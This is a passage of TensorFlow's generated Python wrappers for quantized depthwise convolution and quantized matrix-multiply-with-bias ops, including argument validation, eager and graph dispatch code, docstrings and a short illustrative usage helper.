out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedDepthwiseConv2D", input=input, filter=filter,
min_input=min_input, max_input=max_input,
min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedDepthwiseConv2D", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DOutput._make(_result)
return _result
QuantizedDepthwiseConv2D = tf_export("raw_ops.QuantizedDepthwiseConv2D")(_ops.to_raw_op(quantized_depthwise_conv2d))
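# ---------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not generated code). Depthwise
# filters are laid out [h, w, in_channels, channel_multiplier], so the
# [2, 2, 3, 2] filter below yields 3 * 2 = 6 output channels. Shapes and the
# helper name are assumptions for the example.
def _demo_quantized_depthwise_conv2d():
  import tensorflow as tf
  x = tf.random.uniform([1, 4, 4, 3], 0.0, 1.0)
  w = tf.random.uniform([2, 2, 3, 2], -1.0, 1.0)
  x_q, x_min, x_max = tf.quantization.quantize(x, 0.0, 1.0, tf.quint8)
  w_q, w_min, w_max = tf.quantization.quantize(w, -1.0, 1.0, tf.qint8)
  # Returns the qint32 output plus the float range it represents.
  return tf.raw_ops.QuantizedDepthwiseConv2D(
      input=x_q, filter=w_q,
      min_input=x_min, max_input=x_max,
      min_filter=w_min, max_filter=w_max,
      strides=[1, 1, 1, 1], padding="SAME")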
def quantized_depthwise_conv2d_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations)
_result = _execute.execute(b"QuantizedDepthwiseConv2D", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedDepthwiseConv2D", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DOutput._make(_result)
return _result
_QuantizedDepthwiseConv2DWithBiasOutput = collections.namedtuple(
"QuantizedDepthwiseConv2DWithBias",
["output", "min_output", "max_output"])
def quantized_depthwise_conv2d_with_bias(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], name=None):
r"""Computes quantized depthwise Conv2D with Bias.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
bias: A `Tensor` of type `float32`. The original bias tensor.
min_input: A `Tensor` of type `float32`.
The float value that the minimum quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the maximum quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the minimum quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the maximum quantized filter value represents.
strides: A list of `ints`. List of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
The type of the output.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
List of dilation values.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedDepthwiseConv2DWithBias", name, input, filter, bias,
min_input, max_input, min_filter, max_filter, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations)
_result = _QuantizedDepthwiseConv2DWithBiasOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_depthwise_conv2d_with_bias_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedDepthwiseConv2DWithBias", input=input, filter=filter,
bias=bias, min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
strides=strides, padding=padding,
out_type=out_type,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasOutput._make(_result)
return _result
QuantizedDepthwiseConv2DWithBias = tf_export("raw_ops.QuantizedDepthwiseConv2DWithBias")(_ops.to_raw_op(quantized_depthwise_conv2d_with_bias))
def quantized_depthwise_conv2d_with_bias_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations)
_result = _execute.execute(b"QuantizedDepthwiseConv2DWithBias", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasOutput._make(_result)
return _result
_QuantizedDepthwiseConv2DWithBiasAndReluOutput = collections.namedtuple(
"QuantizedDepthwiseConv2DWithBiasAndRelu",
["output", "min_output", "max_output"])
def quantized_depthwise_conv2d_with_bias_and_relu(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""Computes quantized depthwise Conv2D with Bias and Relu.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
bias: A `Tensor` of type `float32`. The original bias tensor.
min_input: A `Tensor` of type `float32`.
The float value that the minimum quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the maximum quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the minimum quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the maximum quantized filter value represents.
strides: A list of `ints`. List of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
The type of the output.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
List of dilation values.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedDepthwiseConv2DWithBiasAndRelu", name, input, filter,
bias, min_input, max_input, min_filter, max_filter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations",
dilations, "padding_list", padding_list)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_depthwise_conv2d_with_bias_and_relu_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedDepthwiseConv2DWithBiasAndRelu", input=input, filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluOutput._make(_result)
return _result
QuantizedDepthwiseConv2DWithBiasAndRelu = tf_export("raw_ops.QuantizedDepthwiseConv2DWithBiasAndRelu")(_ops.to_raw_op(quantized_depthwise_conv2d_with_bias_and_relu))
def quantized_depthwise_conv2d_with_bias_and_relu_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedDepthwiseConv2DWithBiasAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluOutput._make(_result)
return _result
_QuantizedDepthwiseConv2DWithBiasAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_depthwise_conv2d_with_bias_and_relu_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""Computes quantized depthwise Conv2D with Bias, Relu and Requantize.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
The original bias tensor.
min_input: A `Tensor` of type `float32`.
The float value that the minimum quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the maximum quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the minimum quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the maximum quantized filter value represents.
min_freezed_output: A `Tensor` of type `float32`.
The minimum float value of the output tensor.
max_freezed_output: A `Tensor` of type `float32`.
The maximum float value of the output tensor.
strides: A list of `ints`. List of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
The type of the output.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
List of dilation values.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize", name,
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_depthwise_conv2d_with_bias_and_relu_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize", input=input,
filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize = tf_export("raw_ops.QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize")(_ops.to_raw_op(quantized_depthwise_conv2d_with_bias_and_relu_and_requantize))
def quantized_depthwise_conv2d_with_bias_and_relu_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "out_type", out_type, "strides", strides, "padding", padding,
"dilations", dilations, "padding_list", padding_list)
_result = _execute.execute(b"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedMatMulWithBiasOutput = collections.namedtuple(
"QuantizedMatMulWithBias",
["out", "min_out", "max_out"])
def quantized_mat_mul_with_bias(a, b, bias, min_a, max_a, min_b, max_b, Toutput=_dtypes.qint32, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""Performs a quantized matrix multiplication of `a` by the matrix `b` with bias
add.
The inputs must be two-dimensional matrices, and the bias must be a 1D
vector. The inner dimension of `a` (after being transposed if `transpose_a`
is non-zero) must match the outer dimension of `b` (after being transposed
if `transpose_b` is non-zero). The bias values are then broadcast-added to
the matrix multiplication result. The bias size must match the inner
dimension of `b`.
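A minimal sketch of a call through `tf.raw_ops.QuantizedMatMulWithBias`
(the shapes, ranges, and values are illustrative assumptions; this fused
kernel is typically only registered in oneDNN/MKL-enabled TensorFlow
builds):

  import tensorflow as tf

  a = tf.quantization.quantize(tf.ones([2, 3]), 0.0, 1.0, tf.quint8)
  b = tf.quantization.quantize(tf.ones([3, 4]), -1.0, 1.0, tf.qint8)
  out = tf.raw_ops.QuantizedMatMulWithBias(
      a=a.output, b=b.output, bias=tf.zeros([4]),
      min_a=a.output_min, max_a=a.output_max,
      min_b=b.output_min, max_b=b.output_max)
  # out.out is qint32 with shape [2, 4]; out.min_out / out.max_out give the
  # float range it represents.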
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied. Must be a two-dimensional tensor of type `quint8`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied and must be a two-dimensional tensor of type `qint8`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
A 1D bias tensor whose size matches the inner dimension of `b` (after being
transposed if `transpose_b` is non-zero).
min_a: A `Tensor` of type `float32`.
The float value that the lowest quantized `a` value represents.
max_a: A `Tensor` of type `float32`.
The float value that the highest quantized `a` value represents.
min_b: A `Tensor` of type `float32`.
The float value that the lowest quantized `b` value represents.
max_b: A `Tensor` of type `float32`.
The float value that the highest quantized `b` value represents.
Toutput: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
transpose_a: An optional `bool`. Defaults to `False`.
If true, `a` is transposed before multiplication.
transpose_b: An optional `bool`. Defaults to `False`.
If true, `b` is transposed before multiplication.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
Input data quantization mode: either MIN_FIRST (the default) or SCALED.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (out, min_out, max_out).
out: A `Tensor` of type `Toutput`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBias", name, a, b, bias, min_a, max_a,
min_b, max_b, "Toutput", Toutput, "transpose_a", transpose_a,
"transpose_b", transpose_b, "input_quant_mode", input_quant_mode)
_result = _QuantizedMatMulWithBiasOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, Toutput=Toutput,
transpose_a=transpose_a, transpose_b=transpose_b,
input_quant_mode=input_quant_mode, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if Toutput is None:
Toutput = _dtypes.qint32
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBias", a=a, b=b, bias=bias, min_a=min_a,
max_a=max_a, min_b=min_b, max_b=max_b,
Toutput=Toutput, transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Tbias", _op._get_attr_type("Tbias"), "Toutput",
_op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasOutput._make(_result)
return _result
QuantizedMatMulWithBias = tf_export("raw_ops.QuantizedMatMulWithBias")(_ops.to_raw_op(quantized_mat_mul_with_bias))
def quantized_mat_mul_with_bias_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
if Toutput is None:
Toutput = _dtypes.qint32
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
